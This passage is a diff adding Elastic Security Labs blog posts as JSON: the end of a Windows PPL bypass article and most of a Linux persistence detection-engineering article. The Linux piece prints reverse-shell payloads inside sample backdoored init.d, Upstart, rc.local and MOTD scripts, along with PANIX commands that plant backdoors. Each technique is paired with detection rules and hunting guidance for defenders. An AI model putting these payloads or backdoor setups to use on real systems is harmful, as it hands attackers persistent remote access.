->AclRevision: 0x2\n->Sacl : ->Sbz1 : 0x0\n->Sacl : ->AclSize : 0x34\n->Sacl : ->AceCount : 0x2\n->Sacl : ->Sbz2 : 0x0\n->Sacl : ->Ace[0]: ->AceType: SYSTEM_MANDATORY_LABEL_ACE_TYPE\n->Sacl : ->Ace[0]: ->AceFlags: 0x0\n->Sacl : ->Ace[0]: ->AceSize: 0x14\n->Sacl : ->Ace[0]: ->Mask : 0x00000001\n->Sacl : ->Ace[0]: ->SID: S-1-16-16384\n\n->Sacl : ->Ace[1]: ->AceType: SYSTEM_PROCESS_TRUST_LABEL_ACE_TYPE\n->Sacl : ->Ace[1]: ->AceFlags: 0x0\n->Sacl : ->Ace[1]: ->AceSize: 0x18\n->Sacl : ->Ace[1]: ->Mask : 0x00020018\n->Sacl : ->Ace[1]: ->SID: S-1-19-1024-8192\n\n```\n\nThe SYSTEM_PROCESS_TRUST_LABEL_ACE_TYPE access control entry limits access to READ_CONTROL, TOKEN_QUERY, and TOKEN_QUERY_SOURCE (0x00020018) unless the caller is a WinTcb protected process (SID S-1-19-1024-8192). That SID can be interpreted as follows:\n\n- 1: [Revision 1](https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L1794)\n- 19: [SECURITY_PROCESS_TRUST_AUTHORITY](https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L2097)\n- 1024:\n [SECURITY_PROCESS_PROTECTION_TYPE_FULL_RID](https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L2100)\n- 8192:\n [SECURITY_PROCESS_PROTECTION_LEVEL_WINTCB_RID](https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L2104)\n\n### Mitigation\n\nAlongside this article, we are releasing an update to the [PPLGuard](https://github.com/elastic/PPLGuard) proof-of-concept that protects all running anti-malware PPL processes against this attack. It includes example code that anti-malware products can employ to protect themselves. Here it is in action, protecting Defender:\n\n\n\n## Disclosure\n\nWe disclosed this vulnerability and proposed fixes to the [Microsoft Security Response Center](https://www.microsoft.com/en-us/msrc?rtc=1) (MSRC) on 2022-01-05. They responded on 2022-01-24 that they have classified it as moderate severity, and will not address it with a security update. However, they may address it in a future version of Windows.\n\n## Conclusion\n\nIn this article, we disclosed a flaw in the Windows Protected Process Light (PPL) mechanism. We then demonstrated how malware can use this flaw to neutralize PPL anti-malware products. Finally, we showed a simple ACL fix (with sample code) that anti-malware products can employ to defend against this attack. Elastic Security already incorporates this fix, but we hope that Windows implements it (or something equivalent) by default in the near future.\n"
+ },
+ "title": "Sandboxing Antimalware Products for Fun and Profit",
+ "slug": "sandboxing-antimalware-products",
+ "date": "2023-02-21",
+ "description": "This article demonstrates a flaw that allows attackers to bypass a Windows security mechanism which protects anti-malware products from various forms of attack.",
+ "author": [
+ {
+ "slug": "gabriel-landau"
+ }
+ ],
+ "image": "blog-thumb-tools-various.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-sandboxing_antimalware_products-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sequel_on_persistence_mechanisms-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sequel_on_persistence_mechanisms-md.json
new file mode 100644
index 00000000000..cbfed9a33e6
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sequel_on_persistence_mechanisms-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Linux Detection Engineering - A Sequel on Persistence Mechanisms\"\nslug: \"sequel-on-persistence-mechanisms\"\ndate: \"2024-08-30\"\nsubtitle: \"A walkthrough on how threat actors establish persistence on Linux systems and how to hunt for these techniques.\"\ndescription: \"In this final part of this Linux persistence series, we'll continue exploring persistence mechanisms on Linux systems, focusing on more advanced techniques and how to detect them.\"\nauthor:\n - slug: ruben-groenewoud\nimage: \"sequel-on-persistence-mechanisms.jpg\"\ncategory:\n - slug: detection-science\ntags:\n - linux\n - persistence\n---\n\n## Introduction\n\nIn this third part of the [Linux Detection Engineering series](https://search.elastic.co/?q=Linux%20Detection%20Engineering&location%5B0%5D=Security%20Labs&author%5B0%5D=Ruben%20Groenewoud), we’ll dive deeper into the world of Linux persistence. We start with common or straightforward methods and move towards more complex or obscure techniques. The goal remains the same: to educate defenders and security researchers on the foundational aspects of Linux persistence by examining both trivial and more complicated methods, understanding how these methods work, how to hunt for them, and how to develop effective detection strategies.\n\nIn the previous article - \"Linux Detection Engineering - a primer on persistence mechanisms\" - we explored the foundational aspects of Linux persistence techniques. If you missed it, you can find it [here](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms).\n\nWe'll set up the persistence mechanisms, analyze the logs, and observe the potential detection opportunities. To aid in this process, we’re sharing [PANIX](https://github.com/Aegrah/PANIX), a Linux persistence tool that Ruben Groenewoud of Elastic Security developed. PANIX simplifies and customizes persistence setup to test potential detection opportunities.\n\nBy the end of this series, you'll have gained a comprehensive understanding of each of the persistence mechanisms that we covered, including:\n\n* How it works (theory)\n* How to set it up (practice)\n* How to detect it (SIEM and Endpoint rules)\n* How to hunt for it (ES|QL and OSQuery reference hunts)\n\nLet’s go beyond the basics and dig a little bit deeper into the world of Linux persistence, it’s fun!\n\n## Setup note\n\nTo ensure you are prepared to detect the persistence mechanisms discussed in this article, it is important to [enable and update our pre-built detection rules](https://www.elastic.co/guide/en/security/current/prebuilt-rules-management.html#update-prebuilt-rules). If you are working with a custom-built ruleset and do not use all of our pre-built rules, this is a great opportunity to test them and potentially fill in any gaps. Now, we are ready to get started. \n\n## T1037 - boot or logon initialization scripts: Init\n\nInit, short for \"initialization,\" is the first process started by the kernel during the boot process on Unix-like operating systems. It continues running until the system is shut down. The primary role of an init system is to start, stop, and manage system processes and services.\n\nThere are three major init implementations - [Systemd](https://man7.org/linux/man-pages/man1/systemd.1.html), [System V](https://linux.die.net/man/8/service), and [Upstart](https://linux.die.net/man/7/upstart). In [part 1](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms) of this series, we focused on Systemd. In this part, we will explore System V and Upstart. MITRE does not have specific categories for System V or Upstart. These are generally part of [T1037](https://attack.mitre.org/techniques/T1037/).\n\n### T1037 - boot or logon initialization scripts: System V init\n\n[System V (SysV) init](https://linux.die.net/man/8/service) is one of the oldest and most traditional init systems. SysV init scripts are gradually being replaced by modern init systems like Systemd. However, `systemd-sysv-generator` allows Systemd to handle traditional SysV init scripts, ensuring older services and applications can still be managed within the newer framework.\n\nThe `/etc/init.d/` directory is a key component of the SysV init system. It is responsible for controlling the startup, running, and shutdown of services on a system. Scripts in this directory are executed at different run levels to manage various system services. Despite the rise of Systemd as the default init system in many modern Linux distributions, `init.d` scripts are still widely used and supported, making them a viable option for persistence.\n\nThe scripts in `init.d` are used to start, stop, and manage services. These scripts are executed with root privileges, providing a powerful means for both administrators and attackers to ensure certain commands or services run on boot. These scripts are often linked to [runlevel](https://linux.die.net/man/7/runlevel) directories like `/etc/rc0.d/`, `/etc/rc1.d/`, etc., which determine when the scripts are run. Runlevels, ranging from 0 to 6, define specific operational states, each configuring different services and processes to manage system behavior and user interactions. Runlevels vary depending on the distribution, but generally look like the following:\n\n* 0: Shutdown\n* 1: Single User Mode\n* 2: Multiuser mode without networking\n* 3: Multiuser mode with networking\n* 4: Unused\n* 5: Multiuser mode with networking and GUI\n* 6: Reboot\n\nDuring system startup, scripts are executed based on the current runlevel configuration. Each script must follow a specific structure, including `start`, `stop`, `restart`, and `status` commands to manage the associated service. Scripts prefixed with `S` (start) or `K` (kill) dictate actions during startup or shutdown, respectively, ordered by their numerical sequence.\n\nAn [example](https://github.com/Aegrah/PANIX/blob/main/panix.sh#L1864-L1881) of a malicious `init.d` script might look similar to the following:\n\n```\n#! /bin/sh\n### BEGIN INIT INFO\n# Provides: malicious-sysv-script\n# Required-Start: $remote_fs $syslog\n# Required-Stop: $remote_fs $syslog\n# Default-Start: 2 3 4 5\n# Default-Stop: 0 1 6\n### END INIT INFO\n\ncase \"$1\" in\n start)\n echo \"Starting malicious-sysv-script\"\n nohup setsid bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'\n ;;\nesac\n```\n\nThe script must be placed in the `/etc/init.d/` directory and be granted execution permissions. Similarly to Systemd services, SysV scripts must also be enabled. A common utility to manage SysV configurations is `update-rc.d`. It allows administrators to enable or disable services and manage the symbolic links (start and kill scripts) in the `/etc/rc*.d/` directories, automatically setting the correct runlevels based on the configuration of the script.\n\n```\nsudo update-rc.d malicious-sysv-script defaults\n```\n\nThe `malicious-sysv-script` is now enabled and ready to run on boot. MITRE specifies more information and real-world examples related to this technique in [T1037](https://attack.mitre.org/techniques/T1037/).\n\n#### Persistence through T1037 - System V init\n\nYou can manually set up a test script within the `/etc/init.d/` directory, grant it execution permissions, enable it, and reboot it, or simply use [PANIX](https://github.com/aegrah/PANIX). PANIX is a Linux persistence tool that simplifies and customizes persistence setup for testing your detections. We can use it to establish persistence simply by running:\n\n```\n> sudo ./panix.sh --initd --default --ip 192.168.1.1 --port 2006\n> [+] init.d backdoor established with IP 192.168.1.1 and port 2006.\n```\n\nPrior to rebooting and actually establishing persistence, we can see the following documents being generated in Discover:\n\n\n\nAfter executing PANIX, it generates a SysV init script named `/etc/init.d/ssh-procps`, applies executable permissions using `chmod +x`, and utilizes `update-rc.d`. This command triggers `systemctl daemon-reload`, which, in turn, activates the `systemd-sysv-generator` to enable `ssh-procps` during system boot.\n\nLet’s reboot the system and look at the events that are generated on shutdown/boot.\n\n\n\nAs the SysV init system is loaded early, the start command is not logged. Since it is impossible to detect an event before events are being ingested, we need to be creative in detecting this technique. Elastic will capture `already_running` event actions for service initialization events. Through this chain we are capable of detecting the execution of the service, followed by the reverse shell that was initiated. We have several detection opportunities for this persistence technique.\n\n| Category | Coverage |\n|----------|--------------------------------------------------------------|\n| File | [System V Init Script Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_init_d_file_creation.toml) |\n| | [Suspicious File Creation in /etc for Persistence](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_etc_file_creation.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [System V Init (init.d) Executed Binary from Unusual Location](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_system_v_init_(init.d)_executed_binary_from_unusual_location.toml) |\n| | [Executable Bit Set for Potential Persistence Script](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml) |\n| Network | [System V Init (init.d) Egress Network Connection](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_system_v_init_(init.d)_egress_network_connection.toml) |\n\n\n\n#### Hunting for T1037 - System V init\n\nOther than relying on detections, it is important to incorporate threat hunting into your workflow, especially for persistence mechanisms like these, where events can potentially be missed due to timing. This blog will solely list the available hunts for each persistence mechanism; however, more details regarding this topic are outlined at the end of the first section in [the previous article on persistence](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms). Additionally, descriptions and references can be found in our [Detection Rules repository](https://github.com/elastic/detection-rules), specifically in the [Linux hunting subdirectory](https://github.com/elastic/detection-rules/tree/main/hunting).\n\nWe can hunt for System V Init persistence through [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html) and [OSQuery](https://www.elastic.co/guide/en/kibana/current/osquery.html), focusing on unusual process executions and file creations. The [Persistence via System V Init](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_sysv_init.toml) rule contains several ES|QL and OSQuery queries that can help hunt for these types of persistence.\n\n### T1037 - boot or logon initialization scripts: Upstart\n\n[Upstart](https://linux.die.net/man/7/upstart) was introduced as an alternative init system designed to improve boot performance and manage system services more dynamically than traditional SysV init. While it has been largely supplanted by systemd in many Linux distributions, Upstart is still used in some older releases and legacy systems.\n\nThe core of Upstart's configuration resides in the `/etc/init/` directory, where job configuration files define how services are started, stopped, and managed. Each job file specifies dependencies, start conditions, and actions to be taken upon start, stop, and other events.\n\nIn Upstart, run levels are replaced with events and tasks, which define the sequence and conditions under which jobs are executed. Upstart introduces a more event-driven model, allowing services to start based on various system events rather than predefined run levels.\n\nUpstart can run system-wide or in user-session mode. While system-wide configurations are placed in the `/etc/init/` directory, user-session mode configurations are located in:\n\n* `~/.config/upstart/`\n* `~/.init/`\n* `/etc/xdg/upstart/`\n* `/usr/share/upstart/sessions/`\n\nAn example of an Upstart job file can look like this:\n\n```\ndescription \"Malicious Upstart Job\"\nauthor \"Ruben Groenewoud\"\n\nstart on runlevel [2345]\nstop on shutdown\n\nexec nohup setsid bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'\n```\n\nThe `malicious-upstart-job.conf` file defines a job that starts on run levels 2, 3, 4, and 5 (general Linux access and networking), and stops on run levels 0, 1, and 6 (shutdown/reboot). The `exec` line executes the malicious payload to establish a reverse shell connection when the system boots up.\n\nTo enable the Upstart job and ensure it runs on boot, the job file must be placed in `/etc/init/` and given appropriate permissions. Upstart jobs are automatically recognized and managed by the `Upstart init daemon`.\n\nUpstart was deprecated a long time ago, with Linux distributions such as Debian 7 and Ubuntu 16.04 being the final systems that leverage Upstart by default. These systems moved to the SysV init system, removing compatibility with Upstart altogether. Based on the data in our [support matrix](https://www.elastic.co/support/matrix), only the Elastic Agent in Beta version supports some of these old operating systems, and the recent version of Elastic Defend does not run on them at all. These systems have been EOL for years and should not be used in production environments anymore.\n\nBecause of this reason, we added support/coverage for this technique to the [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) detection rule. If you are still running these systems in production, using, for example, old versions of [Auditbeat](https://www.elastic.co/beats/auditbeat) to gather its logs, you can set up [Auditbeat file creation](https://www.elastic.co/guide/en/beats/auditbeat/current/configuration-auditbeat.html) and [FIM](https://www.elastic.co/docs/current/integrations/fim) file modification rules in the `/etc/init/` directory, similar to the techniques mentioned in the [previous blog](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms), and in the sections yet to come. Similarly to System V Init, information and real-world examples related to this technique are specified by MITRE in [T1037](https://attack.mitre.org/techniques/T1037/).\n\n## T1037.004 - boot or logon initialization scripts: run control (RC) scripts\n\nThe [rc.local](https://man.freebsd.org/cgi/man.cgi?rc.local) script is a traditional method for executing commands or scripts on Unix-like operating systems during system boot. It is located at `/etc/rc.local` and is typically used to start services, configure networking, or perform other system initialization tasks that do not warrant a full init script. In Darwin-based systems and very few other Unix-like systems, `/etc/rc.common` is used for the same purpose. \n\nNewer versions of Linux distributions have phased out the `/etc/rc.local` file in favor of Systemd for handling initialization scripts. Systemd provides compatibility through the [systemd-rc-local-generator](https://man7.org/linux/man-pages/man8/systemd-rc-local-generator.8.html) generator; this executable ensures backward compatibility by checking if `/etc/rc.local` exists and is executable. If it meets these criteria, it integrates the `rc-local.service` unit into the boot process. Therefore, as long as this generator is included in the Systemd setup, `/etc/rc.local` scripts will execute during system boot. In RHEL derivatives, `/etc/rc.d/rc.local` must be granted execution permissions for this technique to work. \n\nThe `rc.local` script is a shell script that contains commands or scripts to be executed once at the end of the system boot process, after all other system services have been started. This makes it useful for tasks that require specific system conditions to be met before execution. Here’s an example of how a simple backdoored `rc.local` script might look:\n\n```\n#!/bin/sh\n/bin/bash -c 'sh -i >& /dev/tcp/$ip/$port 0>&1'\nexit 0\n```\n\nThe command above creates a reverse shell by opening a bash session that redirects input and output to a specified IP address and port, allowing remote access to the system.\n\nTo ensure `rc.local` runs during boot, the script must be marked executable. On the next boot, the `systemd-rc-local-generator` will create the necessary symlink in order to enable the `rc-local.service` and execute the `rc.local` script. RC scripts did receive their own sub-technique by MITRE. More information and examples of real-world usage of RC Scripts for persistence can be found in [T1037.004](https://attack.mitre.org/techniques/T1037/004/).\n\n### Persistence through T1037.004 - run control (RC) scripts\n\nAs long as the `systemd-rc-local-generator` is present, establishing persistence through this technique is simple. Create the `/etc/rc.local` file, add your payload, and mark it as executable. We will leverage the following PANIX command to establish it for us.\n\n```\n> sudo ./panix.sh --rc-local --default --ip 192.168.1.1 --port 2007\n> [+] rc.local backdoor established \n```\n\nAfter rebooting the system, we can see the following events being generated:\n\n\n\nThe same issue as before arises. We see the execution of PANIX, creating the `/etc/rc.local` file and granting it execution permissions. When running `systemctl daemon-reload`, we can see the `systemd-rc-local-generator` creating a symlink in the `/run/systemd/generator[.early|late]` directories. \n\nSimilar to the previous example in which we ran into this issue, we can again use the `already_running` `event.action` documents to get some information on the executions. Digging into this, one method that detects potential traces of `rc.local` execution is to search for documents containing `/etc/rc.local start` entries:\n\n\n\nWhere we see `/etc/rc.local` being started, after which a suspicious command is executed. The `/opt/bds_elf` is a rootkit, leveraging `rc.local` as a persistence method. \n\nAdditionally, we can leverage the [syslog](https://man7.org/linux/man-pages/man3/syslog.3.html) data source, as this file is parsed on initialization of the system integration. You can set up [Filebeat](https://www.elastic.co/beats/filebeat) or the [Elastic Agent](https://www.elastic.co/elastic-agent) with the [System integration](https://www.elastic.co/docs/current/en/integrations/system) to harvest syslog. When looking at potential errors in its execution logs, we can detect other traces of `rc.local` execution events for both our testing and rootkit executions:\n\n\n\nBecause of the challenges in detecting these persistence mechanisms, it is very important to catch traces as early in the chain as possible. Leveraging a multi-layered defense strategy increases the chances of detecting techniques like these.\n\n| Category | Coverage |\n|----------|-----------------------------------------------------|\n| File | [rc.local/rc.common File Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_rc_script_creation.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [Potential Execution of rc.local Script](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_rc_local_service_already_running.toml) |\n| | [Executable Bit Set for Potential Persistence Script](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml) |\n| Syslog | [Suspicious rc.local Error Message](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_rc_local_error_via_syslog.toml) |\n\n### Hunting for T1037.004 - run control (RC) scripts\n\nSimilar to the System V Init detection opportunity limitations, this technique deals with the same limitations due to timing. Thus, hunting for RC Script persistence is important. We can hunt for this technique by looking at `/etc/rc.local` file creations and/or modifications and the existence of the `rc-local.service` systemd unit/startup item. The [Persistence via rc.local/rc.common](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_rc_local.toml) rule contains several ES|QL and OSQuery queries that aid in hunting for this technique. \n\n## T1037 - boot or logon initialization scripts: Message of the Day (MOTD)\n\n[Message of the Day (MOTD)](https://linux.die.net/man/5/motd) is a feature that displays a message to users when they log in via SSH or a local terminal. To display messages before and after the login process, Linux uses the `/etc/issue` and the `/etc/motd` files. These messages display on the command line and will not be seen before and after a graphical login. The `/etc/issue` file is typically used to display a login message or banner, while the `/etc/motd` file generally displays issues, security policies, or messages. These messages are global and will display to all users at the command line prompt. Only a privileged user (such as root) can edit these files.\n\nIn addition to the static `/etc/motd` file, modern systems often use dynamic MOTD scripts stored in `/etc/update-motd.d/`. These scripts generate dynamic content that can be included in the MOTD, such as current system metrics, weather updates, or news headlines.\n\nThese dynamic scripts are shell scripts that execute shell commands. It is possible to create a new file within this directory or to add a backdoor to an existing one. Once the script has been granted execution permissions, it will execute every time a user logs in.\n\nRHEL derivatives do not make use of dynamic MOTD scripts in a similar way as Debian does, and are not susceptible to this technique. \n\nAn example of a backdoored `/etc/update-motd.d/` file could look like this:\n\n```\n#!/bin/sh\nnohup setsid bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'\n```\n\nLike before, MITRE does not have a specific technique related to this. Therefore we classify this technique as [T1037](https://attack.mitre.org/techniques/T1037/).\n\n### Persistence through T1037 - message of the day (MOTD)\n\nA [payload](https://github.com/Aegrah/PANIX/blob/main/panix.sh#L1644-L1669) similar to the one presented above should be used to ensure the backdoor does not interrupt the SSH login, potentially triggering the user’s attention. We can leverage PANIX to set up persistence on Debian-based systems through MOTD like so:\n\n```\n > sudo ./panix.sh --motd --default --ip 192.168.1.1 --port 2008\n> [+] MOTD backdoor established in /etc/update-motd.d/137-python-upgrades\n```\n\nTo trigger the backdoor, we can reconnect to the server via SSH or reconnect to the terminal.\n\n persistence establishment\")\n\nIn the image above we can see PANIX being executed, which creates the `/etc/update-motd.d/137-python-upgrades` file and marks it as executable. Next, when a user connects to SSH/console, the payload is executed, resulting in an egress network connection by the root user. This is a straightforward attack chain, and we have several layers of detections for this:\n\n| Category | Coverage |\n|----------|------------------------------------------------------|\n| File | [Message-of-the-Day (MOTD) File Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_message_of_the_day_creation.tom) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [Process Spawned from Message-of-the-Day (MOTD)](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_suspicious_process_spawned_from_motd_detected.toml) |\n| | [Suspicious Message Of The Day Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_suspicious_message_of_the_day_execution.toml) |\n| | [Executable Bit Set for Potential Persistence Script](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml) |\n| Network | [MOTD Execution Followed by Egress Network Connection](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_motd_execution_followed_by_egress_network_connection.toml) |\n| | [Egress Network Connection by MOTD Child](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_egress_network_connection_by_motd_child.toml) |\n\n### Hunting for T1037 - message of the day (MOTD)\n\nHunting for MOTD persistence can be conducted through ES|QL and OSQuery. We can do so by analyzing file creations in these directories and executions from MOTD parent processes. We created the [Persistence via Message-of-the-Day](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_message_of_the_day.toml) rule aid in this endeavor.\n\n## T1546 - event triggered execution: udev\n\n[Udev](https://man7.org/linux/man-pages/man7/udev.7.html) is the device manager for the Linux kernel, responsible for managing device nodes in the `/dev` directory. It dynamically creates or removes device nodes, manages permissions, and handles various events triggered by device state changes. Essentially, Udev acts as an intermediary between the kernel and user space, ensuring that the operating system appropriately handles hardware changes.\n\nWhen a new device is added to the system (such as a USB drive, keyboard, or network interface), Udev detects this event and applies predefined rules to manage the device. Each rule consists of key-value pairs that match device attributes and actions to be performed. Udev rules files are processed in lexical order, and rules can match various device attributes, including device type, kernel name, and more. Udev rules are defined in text files within a default set of directories:\n\n* `/etc/udev/rules.d/`\n* `/run/udev/rules.d/`\n* `/usr/lib/udev/rules.d/`\n* `/usr/local/lib/udev/rules.d/`\n* `/lib/udev/`\n\nPriority is measured based on the source directory of the rule file and takes precedence based on the order listed above (`/etc/` → `/run/` → `/usr/`). When a rule matches, it can trigger a wide range of actions, including executing arbitrary commands or scripts. This flexibility makes Udev a potential vector for persistence by malicious actors. An example Udev rule looks like the following:\n\n```\nSUBSYSTEM==\"block\", ACTION==\"add|change\", ENV{DM_NAME}==\"ubuntu--vg-ubuntu--lv\", SYMLINK+=\"disk/by-dname/ubuntu--vg-ubuntu--lv\"\n```\n\nTo leverage this method for persistence, root privileges are required. Once a rule file is created, the rules need to be reloaded.\n\n```\nsudo udevadm control --reload-rules\n```\n\nTo test the rule, either perform the action specified in the rule file or use the [udevadm](https://www.man7.org/linux/man-pages/man8/udevadm.8.html) trigger utility.\n\n```\nsudo udevadm trigger -v\n```\n\nAdditionally, these drivers can be monitored using `udevadm`, by running:\n\n```\nudevadm monitor --environment\n```\n\nEder’s [blog](https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/) titled “Leveraging Linux udev for persistence” is a very good read for more information on this topic. This technique has several limitations, making it more difficult to leverage the persistence mechanism.\n\n* Udev rules are limited to short foreground tasks due to potential blocking of subsequent events.\n* They cannot execute programs accessing networks or filesystems, enforced by `systemd-udevd.service`'s sandbox.\n* Long-running processes are terminated after event handling.\n\nDespite these restrictions, bypasses include creating detached processes outside udev rules for executing implants, such as:\n\n* Leveraging `at`/`cron`/`systemd` for independent scheduling.\n* Injecting code into existing processes.\n\nAlthough persistence would be set up through a different technique than udev, udev would still grant a persistence mechanism for the `at`/`cron`/`systemd` persistence mechanism. MITRE does not have a technique dedicated to this mechanism — the most logical technique to add this to would be [T1546](https://attack.mitre.org/techniques/T1546/).\n\nResearchers from AON recently discovered a malware called \"sedexp\" that achieves persistence using Udev rules - a technique rarely seen in the wild - so be sure to check out [their research article](https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp).\n\n## Persistence through T1546 - udev\n\nPANIX allows you to test all three techniques by leveraging `--at`, `--cron` and `--systemd`, respectively. Or go ahead and test it manually. We can set up udev persistence through `at`, by running the following command:\n\n```\n> sudo ./panix.sh --udev --default --ip 192.168.1.1 --port 2009 --at\n```\n\nTo trigger the payload, you can either run `sudo udevadm trigger` or reboot the system. Let’s analyze the events in Discover.\n\n\n\nIn the figure above, PANIX is executed, which creates the `/usr/bin/atest` backdoor and grants it execution permissions. Subsequently, the `10-atest.rules` file is generated, and the drivers are reloaded and triggered. This causes `At` to be spawned as a child process of `udevadm`, creating the `atspool`/`atjob`, and subsequently executing the reverse shell.\n\nCron follows a similar structure; however, it is slightly more difficult to catch the malicious activity, as the child process of `udevadm` is `bash`, which is not unusual.\n\n\n\nFinally, when looking at the documents generated by Udev in combination with Systemd, we see the following:\n\n\n\nWhich also does not show a relationship with udev, other than the `12-systemdtest.rules` file that is created. \n\nThis leads these last two mechanisms to be detected through our previous systemd/cron related rules, rather than specific udev rules. Let’s take a look at the coverage (We omitted the `systemd`/`cron` rules, as these were already mentioned in [the previous persistence blog](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms)):\n\n| Category | Coverage |\n|----------|------------------------------------------------------|\n| File | [Systemd-udevd Rule File Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_udev_rule_creation.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [At Utility Launched through Udevadm](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_at_utility_launched_through_udevadm.toml) |\n| | [Executable Bit Set for Potential Persistence Script](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml) |\n| Network | [Udev Execution Followed by Egress Network Connection](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_udev_execution_followed_by_egress_network_connection.toml) |\n\n### Hunting for T1546 - udev\n\nHunting for Udev persistence can be conducted through ES|QL and OSQuery. By leveraging ES|QL, we can detect unusual file creations and process executions, and through OSQuery we can do live hunting on our managed systems. To get you started, we created the [Persistence via Udev](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_udev.toml) rule, containing several different queries.\n\n## T1546.016 - event triggered execution: installer packages\n\nPackage managers are tools responsible for installing, updating, and managing software packages. Three widely used package managers are [APT](https://linux.die.net/man/8/apt) (Advanced Package Tool), [YUM](https://man7.org/linux/man-pages/man8/yum.8.html) (Yellowdog Updater, Modified), and YUM’s successor, [DNF](https://man7.org/linux/man-pages/man8/dnf.8.html) (Danified YUM). Beyond their legitimate uses, these tools can be leveraged by attackers to establish persistence on a system by hijacking the package manager execution flow, ensuring malicious code is executed during routine package management operations. MITRE details information related to this technique under the identifier [T1546.016](https://attack.mitre.org/techniques/T1546/016/).\n\n### T1546.016 - installer packages (APT)\n\n[APT](https://linux.die.net/man/8/apt) is the default package manager for Debian-based Linux distributions like Debian, Ubuntu, and their derivatives. It simplifies the process of managing software packages and dependencies. APT utilizes several configuration mechanisms to customize its behavior and enhance package management efficiency. \n\n[APT hooks](https://manpages.debian.org/testing/apt/apt.conf.5.en.html) allow users to execute scripts or commands at specific points during package installation, removal, or upgrade operations. These hooks are stored in `/etc/apt/apt.conf.d/` and can be leveraged to execute actions pre- and post-installation. The structure of APT configuration files follows a numeric ordering convention to control the application of configuration snippets that customize various aspects of APT's behavior. A regular APT hook looks like this:\n\n```\nDPkg::Post-Invoke {\"if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true\";}; APT::Update::Post-Invoke-Success {\"/usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true\";}; \n```\n\nThese configuration files can be exploited by attackers to execute malicious binaries or code whenever an APT operation is executed. This vulnerability extends to automated processes like auto-updates, enabling persistent execution on systems with automatic update features enabled.\n\n#### Persistence through T1546.016 - installer packages (APT)\n\nTo test this method, a Debian-based system that leverages APT or the manual installation of APT is required. Make sure that if you perform this step manually, that you do not break the APT package manager, as [a carefully crafted payload](https://github.com/Aegrah/PANIX/blob/main/panix.sh#L2021C4-L2021C138) that detaches and runs in the background is necessary to not interrupt the execution chain. You can setup APT persistence by running:\n\n```\n> sudo ./panix.sh --package-manager --ip 192.168.1.1 --port 2012 --apt\n> [+] APT persistence established\n```\n\nTo trigger the payload, run an APT command, such as `sudo apt update`. This will spawn a reverse shell. Let’s take a look at the events in Discover:\n\n persistence establishment\")\n\nIn the figure above, we see PANIX being executed, creating the `01python-upgrades` file, and successfully 